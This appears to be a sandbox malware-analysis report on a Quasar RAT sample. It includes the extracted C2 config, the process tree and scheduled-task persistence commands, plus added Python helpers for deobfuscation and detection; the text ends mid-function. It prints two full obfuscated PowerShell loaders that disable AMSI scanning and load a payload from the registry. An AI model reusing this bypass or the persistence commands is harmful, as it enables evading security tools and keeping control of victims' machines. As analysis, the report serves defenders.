Analysis
- max time kernel: 1800s
- max time network: 1801s
- platform: windows10-2004_x64
- resource: win10v2004-20240508-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20240508-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 08/05/2024, 17:28
Behavioral tasks
- behavioral1: sample Uni.exe, resource win10-20240404-en
- behavioral2: sample Uni.exe, resource win7-20240419-en
- behavioral3: sample Uni.exe, resource win10v2004-20240508-en
General
- Target: Uni.exe
- Size: 409KB
- MD5: 7417c8c73e614f293152575f46134216
- SHA1: cc68f7f5e7c769efb5b3e06bfb3a2f9329f37805
- SHA256: 00c7cb06bebe0da961155dc00f7ea7f96a3b04c89ae82408e7ece6968c91c3c3
- SHA512: 897a859e609028157f2721d76b97497d4b9f821d2b8be3359d1192ddc3a83d4b7449db25c63c3c260067b796c122194c48747dc611c98dc1e33aab82a20b98b0
- SSDEEP: 6144:nMr2pJAJcC0B632U3GRbMfgvKFFhTEDPX1NbKoEn5MSU+h2f8/14m:LpyJcC+82U3GRGGp1M5Ys2f8/6m
Malware Config
Extracted: quasar
- 3.1.5
- SLAVE
- even-lemon.gl.at.ply.gg:33587
- $Sxr-dOMA5C0pQTTpKjVsCp
- encryption_key: UBXs44u6E81wxBGZxQHk
- install_name: $sxr-powershell.exe
- log_directory: $SXR-KEYLOGS
- reconnect_delay: 3000
- startup_key: $sxr-powershell
- subdirectory: $sxr-seroxen2
Signatures
- Quasar payload (2 IoCs)
  resource behavioral3/memory/1724-1-0x0000000000C20000-0x0000000000C8C000-memory.dmp, yara_rule family_quasar
  resource behavioral3/files/0x0007000000023278-11.dat, yara_rule family_quasar
- Suspicious use of NtCreateUserProcessOtherParentProcess (2 IoCs)
  PID 4000 created 616 (powershell.EXE, procid_target 5)
  PID 4048 created 616 (powershell.EXE, procid_target 5)
- Downloads MZ/PE file
- Executes dropped EXE (3 IoCs)
  PID 1080 $sxr-powershell.exe; PID 2640 install.exe; PID 1540 install.exe
- Legitimate hosting services abused for malware hosting/C2 (1 TTPs, 3 IoCs)
  flows 13, 14, 23: raw.githubusercontent.com
- Looks up external IP address via web service (1 IoCs)
  Uses a legitimate IP lookup service to find the infected system's external IP.
  flow 7: ip-api.com
- Drops file in System32 directory (13 IoCs)
- Suspicious use of SetThreadContext (2 IoCs)
  PID 4000 set thread context of 3548 (powershell.EXE, procid_target 98)
  PID 4048 set thread context of 644 (powershell.EXE, procid_target 99)
- Creates scheduled task(s) (1 TTPs, 3 IoCs)
  Schtasks is often used by malware for persistence or to perform post-infection execution.
  PID 2968 schtasks.exe; PID 4032 SCHTASKS.exe; PID 3928 schtasks.exe
- Modifies data under HKEY_USERS (64 IoCs)
- Modifies registry class (18 IoCs)
- Suspicious behavior: EnumeratesProcesses (64 IoCs)
- Suspicious use of AdjustPrivilegeToken (64 IoCs)
- Suspicious use of SetWindowsHookEx (1 IoCs)
  PID 1080 $sxr-powershell.exe
- Suspicious use of UnmapMainImage (1 IoCs)
  PID 3564 Explorer.EXE
- Suspicious use of WriteProcessMemory (64 IoCs)
Processes
- PID 616: C:\Windows\system32\winlogon.exe (command line: winlogon.exe)
  - PID 60: C:\Windows\system32\dwm.exe (command line: "dwm.exe")
    signatures: Suspicious use of AdjustPrivilegeToken
  - PID 3548: C:\Windows\System32\dllhost.exe (command line: C:\Windows\System32\dllhost.exe /Processid:{e958a193-9963-4c23-9ea2-cf892b129985})
    signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
  - PID 644: C:\Windows\System32\dllhost.exe (command line: C:\Windows\System32\dllhost.exe /Processid:{fe4478b9-0051-4074-b630-a9dc39d9cb95})
    signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
- PID 676: C:\Windows\system32\lsass.exe (command line: C:\Windows\system32\lsass.exe)
  signatures: Suspicious use of WriteProcessMemory
- PID 948: C:\Windows\system32\svchost.exe (command line: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM)
- PID 512: C:\Windows\system32\svchost.exe (command line: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc)
- PID 944: C:\Windows\System32\svchost.exe (command line: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts)
- PID 1052: C:\Windows\System32\svchost.exe (command line: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService)
- PID 1088: C:\Windows\system32\svchost.exe (command line: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc)
- PID 1132: C:\Windows\System32\svchost.exe (command line: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog)
  signatures: Drops file in System32 directory
- PID 1168: C:\Windows\system32\svchost.exe (command line: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule)
  - PID 2772: C:\Windows\system32\taskhostw.exe (command line: taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E})
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:mCXkdBosmkrz{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$jQrnzePqSeFjVJ,[Parameter(Position=1)][Type]$itemsMtXpB)$LLbeBYuINnx=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+[Char](101)+''+'f'+'le'+[Char](99)+''+[Char](116)+'e'+[Char](100)+''+[Char](68)+''+[Char](101)+''+'l'+''+[Char](101)+''+'g'+'a'+[Char](116)+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('In'+[Char](77)+''+[Char](101)+''+'m'+''+[Char](111)+''+'r'+'y'+[Char](77)+'o'+'d'+''+[Char](117)+''+'l'+''+[Char](101)+'',$False).DefineType(''+[Char](77)+''+[Char](121)+'D'+[Char](101)+'le'+[Char](103)+''+[Char](97)+''+[Char](116)+''+[Char](101)+''+[Char](84)+'yp'+[Char](101)+'',''+'C'+''+'l'+''+[Char](97)+''+[Char](115)+'s'+[Char](44)+''+'P'+'u'+[Char](98)+''+[Char](108)+'i'+[Char](99)+''+','+'S'+'e'+''+[Char](97)+''+[Char](108)+''+[Char](101)+'d'+','+'A'+'n'+''+'s'+''+'i'+''+[Char](67)+''+'l'+''+'a'+''+[Char](115)+''+[Char](115)+''+[Char](44)+''+[Char](65)+'u'+[Char](116)+''+'o'+''+[Char](67)+''+[Char](108)+'as'+[Char](115)+'',[MulticastDelegate]);$LLbeBYuINnx.DefineConstructor('RTSp'+'e'+''+'c'+''+[Char](105)+''+[Char](97)+''+[Char](108)+''+'N'+''+[Char](97)+''+'m'+''+[Char](101)+''+','+'Hi'+[Char](100)+''+'e'+''+[Char](66)+''+'y'+'S'+[Char](105)+''+[Char](103)+''+[Char](44)+'P'+'u'+'b'+'l'+''+[Char](105)+''+'c'+'',[Reflection.CallingConventions]::Standard,$jQrnzePqSeFjVJ).SetImplementationFlags(''+[Char](82)+''+[Char](117)+'nti'+[Char](109)+''+[Char](101)+''+[Char](44)+''+'M'+''+'a'+''+[Char](110)+''+[Char](97)+'g'+'e'+'d');$LLbeBYuINnx.DefineMethod(''+[Char](73)+'n'+[Char](118)+'o'+'k'+''+'e'+'',''+[Char](80)+''+[Char](117)+''+[Char](98)+'li'+[Char](99)+''+','+''+[Char](72)+''+[Char](105)+''+[Char](100)+''+'e'+'ByS'+[Char](105)+''+'g'+''+[Char](44)+''+[Char](78)+''+[Char](101)+''+'w'+''+[Char](83)+
''+[Char](108)+'o'+[Char](116)+''+','+''+'V'+''+[Char](105)+'r'+[Char](116)+'u'+[Char](97)+''+[Char](108)+'',$itemsMtXpB,$jQrnzePqSeFjVJ).SetImplementationFlags('R'+[Char](117)+''+[Char](110)+''+'t'+''+'i'+'me'+[Char](44)+''+[Char](77)+''+'a'+''+[Char](110)+''+[Char](97)+'ge'+[Char](100)+'');Write-Output $LLbeBYuINnx.CreateType();}$qhfxpecUiWpvl=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+'y'+'ste'+'m'+''+[Char](46)+'d'+[Char](108)+''+[Char](108)+'')}).GetType(''+[Char](77)+''+[Char](105)+''+'c'+'ro'+[Char](115)+'o'+'f'+'t'+'.'+''+[Char](87)+'i'+[Char](110)+''+'3'+''+[Char](50)+''+'.'+'U'+[Char](110)+'s'+'a'+''+[Char](102)+''+[Char](101)+''+[Char](78)+''+[Char](97)+''+'t'+''+[Char](105)+''+'v'+''+[Char](101)+''+'M'+''+[Char](101)+''+[Char](116)+'ho'+[Char](100)+''+[Char](115)+'');$ZDzpwzKWMdMfbJ=$qhfxpecUiWpvl.GetMethod('G'+'e'+'t'+[Char](80)+''+[Char](114)+''+[Char](111)+''+[Char](99)+''+[Char](65)+''+'d'+''+[Char](100)+'res'+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+'b'+[Char](108)+''+[Char](105)+'c'+[Char](44)+''+'S'+'t'+'a'+''+[Char](116)+''+'i'+'c'),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$MOAleEdLausBlxfMMlz=mCXkdBosmkrz @([String])([IntPtr]);$xSmgXuSOZSVHWTKuJvfOLi=mCXkdBosmkrz 
@([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$cJJXSYshHhV=$qhfxpecUiWpvl.GetMethod('G'+[Char](101)+'t'+'M'+''+'o'+''+'d'+''+[Char](117)+''+[Char](108)+'e'+[Char](72)+''+[Char](97)+''+[Char](110)+''+[Char](100)+''+'l'+''+'e'+'').Invoke($Null,@([Object]('ke'+'r'+'n'+[Char](101)+''+[Char](108)+'3'+'2'+''+[Char](46)+''+'d'+''+[Char](108)+''+'l'+'')));$DujHIhsutrTluc=$ZDzpwzKWMdMfbJ.Invoke($Null,@([Object]$cJJXSYshHhV,[Object]('L'+'o'+'a'+[Char](100)+'L'+'i'+''+'b'+''+'r'+'a'+'r'+''+[Char](121)+''+[Char](65)+'')));$AYJBwFEEtVlwgGEgo=$ZDzpwzKWMdMfbJ.Invoke($Null,@([Object]$cJJXSYshHhV,[Object](''+[Char](86)+''+'i'+'r'+[Char](116)+''+'u'+'a'+[Char](108)+''+[Char](80)+''+'r'+''+[Char](111)+''+[Char](116)+''+'e'+''+[Char](99)+''+[Char](116)+'')));$lqgfIcf=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($DujHIhsutrTluc,$MOAleEdLausBlxfMMlz).Invoke('a'+[Char](109)+''+[Char](115)+''+[Char](105)+'.'+[Char](100)+''+'l'+'l');$yEpjVjUFedPqzTNwa=$ZDzpwzKWMdMfbJ.Invoke($Null,@([Object]$lqgfIcf,[Object]('A'+[Char](109)+'s'+[Char](105)+''+'S'+''+'c'+''+'a'+''+'n'+''+[Char](66)+''+'u'+''+'f'+''+'f'+''+[Char](101)+''+[Char](114)+'')));$TBSoVryaKg=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($AYJBwFEEtVlwgGEgo,$xSmgXuSOZSVHWTKuJvfOLi).Invoke($yEpjVjUFedPqzTNwa,[uint32]8,4,[ref]$TBSoVryaKg);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$yEpjVjUFedPqzTNwa,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($AYJBwFEEtVlwgGEgo,$xSmgXuSOZSVHWTKuJvfOLi).Invoke($yEpjVjUFedPqzTNwa,[uint32]8,0x20,[ref]$TBSoVryaKg);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+'O'+'FT'+[Char](87)+''+[Char](65)+'R'+[Char](69)+'').GetValue(''+[Char](36)+''+'7'+''+'7'+''+[Char](115)+''+[Char](116)+'a'+'g'+'e'+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4000
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:VHUlKDHOaaXL{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$fGdQtsyqVZZYAp,[Parameter(Position=1)][Type]$joTUiHyUGU)$nOrjXkmlbTq=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+'f'+[Char](108)+''+'e'+''+'c'+'t'+[Char](101)+''+[Char](100)+''+[Char](68)+''+[Char](101)+''+[Char](108)+'e'+'g'+''+[Char](97)+''+[Char](116)+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+'n'+''+[Char](77)+''+'e'+''+'m'+''+[Char](111)+'r'+[Char](121)+''+[Char](77)+''+[Char](111)+''+[Char](100)+''+[Char](117)+'le',$False).DefineType(''+[Char](77)+'yD'+[Char](101)+'l'+'e'+''+'g'+''+[Char](97)+''+'t'+''+'e'+''+[Char](84)+''+'y'+''+'p'+'e',''+'C'+''+'l'+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+','+''+'P'+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+'i'+''+[Char](99)+''+[Char](44)+''+[Char](83)+''+[Char](101)+'al'+[Char](101)+''+[Char](100)+''+[Char](44)+''+[Char](65)+'nsi'+'C'+''+'l'+''+'a'+''+'s'+''+[Char](115)+''+[Char](44)+''+[Char](65)+''+[Char](117)+''+'t'+''+[Char](111)+'C'+'l'+''+[Char](97)+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$nOrjXkmlbTq.DefineConstructor(''+[Char](82)+''+'T'+''+'S'+''+'p'+''+'e'+''+[Char](99)+''+[Char](105)+''+'a'+''+[Char](108)+''+[Char](78)+''+'a'+'m'+'e'+''+[Char](44)+''+[Char](72)+''+[Char](105)+''+'d'+'e'+'B'+''+[Char](121)+''+[Char](83)+'i'+[Char](103)+''+[Char](44)+''+[Char](80)+''+'u'+''+[Char](98)+''+'l'+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$fGdQtsyqVZZYAp).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+'n'+'t'+[Char](105)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+'a'+''+[Char](110)+'a'+[Char](103)+''+[Char](101)+''+[Char](100)+'');$nOrjXkmlbTq.DefineMethod(''+'I'+'n'+[Char](118)+''+[Char](111)+'k'+'e'+'',''+[Char](80)+''+[Char](117)+'b'+'l
'+''+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](72)+'i'+[Char](100)+'eBy'+[Char](83)+''+'i'+''+'g'+''+[Char](44)+''+'N'+'e'+[Char](119)+''+[Char](83)+'l'+[Char](111)+'t'+[Char](44)+''+[Char](86)+''+'i'+'r'+'t'+''+'u'+'al',$joTUiHyUGU,$fGdQtsyqVZZYAp).SetImplementationFlags('R'+[Char](117)+''+'n'+''+'t'+'im'+[Char](101)+''+','+''+[Char](77)+''+'a'+''+[Char](110)+''+'a'+''+[Char](103)+'e'+[Char](100)+'');Write-Output $nOrjXkmlbTq.CreateType();}$sNozhZzIkcwMl=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+[Char](115)+''+[Char](116)+''+[Char](101)+''+[Char](109)+''+[Char](46)+''+[Char](100)+'l'+[Char](108)+'')}).GetType(''+[Char](77)+''+'i'+''+[Char](99)+''+[Char](114)+'o'+[Char](115)+''+[Char](111)+''+[Char](102)+''+'t'+''+'.'+''+'W'+''+'i'+''+'n'+''+[Char](51)+''+[Char](50)+''+[Char](46)+'U'+[Char](110)+''+'s'+''+[Char](97)+''+[Char](102)+''+[Char](101)+''+[Char](78)+''+'a'+''+'t'+''+'i'+''+[Char](118)+''+[Char](101)+''+[Char](77)+''+'e'+''+'t'+''+[Char](104)+''+'o'+'d'+[Char](115)+'');$KhXHYMKLDxWdAN=$sNozhZzIkcwMl.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+'P'+[Char](114)+''+[Char](111)+''+'c'+'A'+[Char](100)+''+'d'+''+[Char](114)+''+'e'+''+'s'+'s',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+''+'b'+''+[Char](108)+''+'i'+''+[Char](99)+''+[Char](44)+''+[Char](83)+''+[Char](116)+''+[Char](97)+''+'t'+'i'+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$QVeotFJywKvrBXvXUQo=VHUlKDHOaaXL @([String])([IntPtr]);$SyYRqsqyiLxfNsUkbPmJig=VHUlKDHOaaXL 
@([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$BtnfBJpTPbl=$sNozhZzIkcwMl.GetMethod(''+'G'+''+[Char](101)+''+[Char](116)+''+[Char](77)+''+'o'+''+[Char](100)+'ul'+'e'+'H'+[Char](97)+''+[Char](110)+''+[Char](100)+''+'l'+''+'e'+'').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+'rnel'+[Char](51)+'2'+'.'+'d'+'l'+''+'l'+'')));$DghpFKiqjocmUY=$KhXHYMKLDxWdAN.Invoke($Null,@([Object]$BtnfBJpTPbl,[Object](''+'L'+''+[Char](111)+'a'+[Char](100)+''+[Char](76)+''+'i'+''+[Char](98)+''+[Char](114)+''+[Char](97)+''+[Char](114)+''+[Char](121)+'A')));$SayvemgIQDQzOnRLO=$KhXHYMKLDxWdAN.Invoke($Null,@([Object]$BtnfBJpTPbl,[Object](''+'V'+''+[Char](105)+'r'+[Char](116)+'u'+[Char](97)+'l'+[Char](80)+''+'r'+''+[Char](111)+'t'+'e'+'c'+'t'+'')));$QAjoSlF=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($DghpFKiqjocmUY,$QVeotFJywKvrBXvXUQo).Invoke(''+'a'+''+[Char](109)+''+[Char](115)+''+'i'+''+'.'+''+[Char](100)+''+[Char](108)+''+'l'+'');$vmmOrbSJWRDLUTNVw=$KhXHYMKLDxWdAN.Invoke($Null,@([Object]$QAjoSlF,[Object](''+[Char](65)+''+[Char](109)+''+'s'+''+[Char](105)+'S'+[Char](99)+'a'+[Char](110)+''+'B'+'u'+'f'+''+[Char](102)+''+[Char](101)+''+[Char](114)+'')));$KMmjuSvLTi=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($SayvemgIQDQzOnRLO,$SyYRqsqyiLxfNsUkbPmJig).Invoke($vmmOrbSJWRDLUTNVw,[uint32]8,4,[ref]$KMmjuSvLTi);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$vmmOrbSJWRDLUTNVw,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($SayvemgIQDQzOnRLO,$SyYRqsqyiLxfNsUkbPmJig).Invoke($vmmOrbSJWRDLUTNVw,[uint32]8,0x20,[ref]$KMmjuSvLTi);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+'O'+[Char](70)+''+[Char](84)+'WAR'+[Char](69)+'').GetValue(''+[Char](36)+'77'+[Char](115)+'t'+[Char](97)+'g'+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4048
    - PID 3428: C:\Windows\System32\Conhost.exe (cmdline: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1)
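The two powershell.EXE command lines above (PIDs 4000 and 4048) build every string out of `'x'+[Char](NN)+''` fragments so that no API name appears literally. Folded together, the fragments resolve to: fetch `GetProcAddress` and `GetModuleHandle` from `Microsoft.Win32.UnsafeNativeMethods` in System.dll, `LoadLibraryA("amsi.dll")`, resolve `AmsiScanBuffer`, `VirtualProtect` its first 8 bytes to PAGE_READWRITE (4), overwrite them with `B8 57 00 07 80 C3` (`mov eax, 0x80070057 ; ret`, so every scan returns E_INVALIDARG without looking at the buffer), set the page back to PAGE_EXECUTE_READ (0x20), then `[Reflection.Assembly]::Load` the bytes stored in the registry value `HKLM\SOFTWARE\$77stager` and invoke its entry point. The Python below is an added helper for reading such command lines; it is not code from the sample or from Triage. Its regular expressions assume exactly the fragment syntax on this page (single-quoted literals and `[Char](N)` casts joined by `+`), and the sample input is an excerpt copied from the command lines above.

```python
"""Recover plaintext from the PowerShell string-fragment obfuscation used by the
two powershell.EXE command lines in this report.

Added example for analysts; not code from the sample or from Triage. The
regular expressions assume exactly the fragment syntax seen on this page:
single-quoted literals and [Char](N) casts joined by '+'.
"""
import re
import struct

# One operand of a concatenation: a single-quoted literal (with '' as the
# PowerShell escape for a quote) or a [Char](N) cast.
_OPERAND = r"(?:'(?:[^']|'')*'|\[Char\]\(\d+\))"
# A chain of two or more operands joined by '+'. Lone literals are left alone.
_CHAIN = re.compile(_OPERAND + r"(?:\s*\+\s*" + _OPERAND + r")+")
_CHAR = re.compile(r"\[Char\]\((\d+)\)")
# The byte array the script writes over the start of AmsiScanBuffer.
_BYTE_ARRAY = re.compile(r"\[Byte\[\]\]\(([^)]*)\)")

E_INVALIDARG = 0x80070057


def eval_operand(token):
    """Return the string one operand evaluates to."""
    m = _CHAR.fullmatch(token)
    if m:
        return chr(int(m.group(1)))
    return token[1:-1].replace("''", "'")


def eval_chain(chain):
    """Concatenate every operand of a chain such as 'a'+[Char](109)+''+'si'."""
    return "".join(eval_operand(t) for t in re.findall(_OPERAND, chain))


def deobfuscate(script):
    """Rewrite every concatenation chain in the script as one quoted literal."""
    def _fold(m):
        return "'" + eval_chain(m.group(0)).replace("'", "''") + "'"
    return _CHAIN.sub(_fold, script)


def extract_patch(script):
    """Pull the [Byte[]](...) literal out of the script as raw bytes."""
    m = _BYTE_ARRAY.search(script)
    if not m:
        raise ValueError("no [Byte[]](...) literal in script")
    return bytes(int(tok.strip(), 0) for tok in m.group(1).split(","))


def decode_patch(patch):
    """Decode a 'mov eax, imm32 ; ret' stub (B8 imm32 C3), the only shape this
    script writes, and report the HRESULT the patched function will return."""
    if len(patch) != 6 or patch[0] != 0xB8 or patch[5] != 0xC3:
        raise ValueError("not a B8 imm32 C3 stub")
    hresult = struct.unpack_from("<I", patch, 1)[0]
    return {
        "asm": f"mov eax, 0x{hresult:08X} ; ret",
        "hresult": hresult,
        # E_INVALIDARG makes every AmsiScanBuffer call fail before scanning,
        # so the caller never sees AMSI_RESULT_DETECTED.
        "is_E_INVALIDARG": hresult == E_INVALIDARG,
    }


# Constructed sample input: fragments copied from the command lines above.
SAMPLE = (
    "Invoke('a'+[Char](109)+''+[Char](115)+''+[Char](105)+'.'+[Char](100)+''+'l'+'l');"
    "[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$p,6);"
    "GetValue(''+[Char](36)+''+'7'+''+'7'+''+[Char](115)+''+[Char](116)+'a'+'g'+'e'+[Char](114)+'')"
)

if __name__ == "__main__":
    print(deobfuscate(SAMPLE))
    print(decode_patch(extract_patch(SAMPLE))["asm"])
```

Run `deobfuscate()` over the whole recorded command line and the chains collapse to `'amsi.dll'`, `'AmsiScanBuffer'`, `'VirtualProtect'`, `'SOFTWARE'` and `'$77stager'`, which is what a ScriptBlock-logging or EDR rule should key on rather than the fragments themselves.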
- PID 1260: C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
- PID 1312: C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
- PID 1428: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
- PID 1440: C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
- PID 1456: C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
  - PID 2676: C:\Windows\system32\sihost.exe (cmdline: sihost.exe)
    - Modifies registry class
- PID 1504: C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
- PID 1512: C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
- PID 1672: C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
- PID 1708: C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
- PID 1764: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
- PID 1800: C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
- PID 1904: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
- PID 1160: C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
- PID 1448: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
- PID 1544: C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
- PID 1692: C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
- PID 2092: C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
- PID 2176: C:\Windows\System32\spoolsv.exe
- PID 2248: C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
- PID 2308: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
- PID 2472: C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
- PID 2480: C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
- PID 2664: C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
- PID 2724: C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
  - Drops file in System32 directory
- PID 2752: C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
- PID 2824: C:\Windows\sysmon.exe
- PID 2848: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
- PID 2860: C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
- PID 2932: C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
- PID 2768: C:\Windows\system32\wbem\unsecapp.exe -Embedding
- PID 3400: C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
- PID 3564: C:\Windows\Explorer.EXE
  - Modifies registry class
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of UnmapMainImage
  - PID 1724: "C:\Users\Admin\AppData\Local\Temp\Uni.exe"
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    - PID 2968: C:\Windows\SysWOW64\schtasks.exe (cmdline: "schtasks" /create /tn "$sxr-powershell" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\Uni.exe" /rl HIGHEST /f)
      - Creates scheduled task(s)
    - PID 1080: "C:\Users\Admin\AppData\Roaming\$sxr-seroxen2\$sxr-powershell.exe"
      - Executes dropped EXE
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of SetWindowsHookEx
      - Suspicious use of WriteProcessMemory
      - PID 3928: C:\Windows\SysWOW64\schtasks.exe (cmdline: "schtasks" /create /tn "$sxr-powershell" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\$sxr-seroxen2\$sxr-powershell.exe" /rl HIGHEST /f)
        - Creates scheduled task(s)
      - PID 1540: "C:\Users\Admin\AppData\Local\Temp\install.exe"
        - Executes dropped EXE
    - PID 2640: "C:\Users\Admin\AppData\Local\Temp\install.exe"
      - Executes dropped EXE
    - PID 4032: C:\Windows\SysWOW64\SCHTASKS.exe (cmdline: "SCHTASKS.exe" /create /tn "$77Uni.exe" /tr "'C:\Users\Admin\AppData\Local\Temp\Uni.exe'" /sc onlogon /rl HIGHEST)
      - Creates scheduled task(s)
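The three schtasks invocations under Explorer.EXE are the sample's persistence: two tasks named `$sxr-powershell` (first pointing at the Temp copy of Uni.exe, then re-created to point at the dropped `$sxr-seroxen2\$sxr-powershell.exe`) and one named `$77Uni.exe`, all triggered at logon (`/sc ONLOGON`), all requesting the highest run level (`/rl HIGHEST`), all pointing at executables under the user's AppData tree. The Python below is an added detection helper, not part of this report: it parses `schtasks /create` command lines from process-creation telemetry and scores them on exactly those traits. The three suspicious lines are copied from the tree above; the fourth, benign line is constructed for contrast, and the set of directories treated as user-writable is the author's choice.

```python
"""Score `schtasks /create` command lines for the persistence traits seen in
this report's process tree.

Added detection example; not part of the Triage report. The first three
sample lines are copied from the tree above, the fourth is a constructed
benign line for contrast. Which directories count as user-writable is the
author's choice.
"""
import re

# Windows command-line tokens: a double-quoted run or a run of non-blanks.
_TOKEN = re.compile(r'"[^"]*"|\S+')
# schtasks options that take a value; everything else is kept as a bare flag.
_VALUE_OPTS = {"/tn", "/tr", "/sc", "/rl", "/st", "/ru", "/rp", "/mo", "/d"}
# Locations an unprivileged user can write to; adjust to your estate.
_USER_WRITABLE = re.compile(r"\\(?:AppData|Temp|ProgramData|Users\\Public)\\", re.IGNORECASE)


def parse_schtasks(cmdline):
    """Return {option: value, '_flags': [...]} for a schtasks invocation, or
    None when the image is not schtasks."""
    toks = [t.strip('"') for t in _TOKEN.findall(cmdline)]
    if not toks:
        return None
    image = re.split(r"[\\/]", toks[0])[-1].lower()
    if image not in ("schtasks", "schtasks.exe"):
        return None
    opts = {"_flags": []}
    i = 1
    while i < len(toks):
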